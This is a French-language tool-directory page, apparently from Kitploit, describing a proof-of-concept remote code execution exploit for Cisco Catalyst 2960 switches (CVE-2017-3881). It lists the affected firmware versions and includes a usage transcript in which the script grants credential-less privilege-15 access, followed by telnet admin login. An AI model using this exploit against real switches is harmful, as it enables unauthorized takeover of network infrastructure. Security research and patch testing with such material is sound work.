Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
PoC-CVE-2017-3881 — PoC d'exécution de code à distance Cisco Catalyst | Kitploit
Outils/GitHubGitHub/mzakyz666/poc-cve-2017-3881
Sécurité des Systèmes EmbarquésFrameworks d'ExploitationAnalyse des VulnérabilitésExploitationSécurité RéseauTests d'Intrusion
GitHubmzakyz666/poc-cve-2017-3881

PoC-CVE-2017-3881

PoC d'exécution de code à distance Cisco Catalyst

Voir le dépôt
121il y a 9 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

PoC-CVE-2017-3881

PoC d'exécution de code à distance sur Cisco Catalyst

Ce dépôt contient un code de preuve de concept pour exploiter une vulnérabilité d'exécution de code à distance divulguée par Cisco Systems le 17 mars 2017 - https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20170317-cmp

Description

Article sur l'exploit : https://errorcybernews.com/2017/05/11/cisco-systems-merilis-update-switch/

Le code d'exploit RCE est disponible pour le commutateur Cisco Catalyst 2960. Cet exploit dépend du firmware. Deux versions du firmware sont prises en charge :

  • 12.2(55)SE1 C2960-LANBASEK9-M

  • 12.2(55)SE11 C2960-LANBASEK9-M

Un code de déni de service est disponible sous la forme d'un module Ruby pour Metasploit. Il devrait fonctionner pour la plupart des commutateurs mentionnés dans l'avis Cisco (confirmation nécessaire).

Exemple d'utilisation

root@kitploit:~
$ python c2960-lanbasek9-m-12.2.55.se11 192.168.88.10 --set
[+] Connection OK
[+] Recieved bytes from telnet service: '\xff\xfb\x01\xff\xfb\x03\xff\xfd\x18\xff\xfd\x1f'
[+] Sending cluster option
[+] Setting credless privilege 15 authentication
[+] All done
$ telnet 192.168.88.10
Trying 192.168.88.10...
Connected to 192.168.88.10.
Escape character is '^]'.

catalyst1#show priv
Current privilege level is 15

Remerciements à l'auteur :

Artem Kondratenko https://twitter.com/artkond

Télécharger l’outil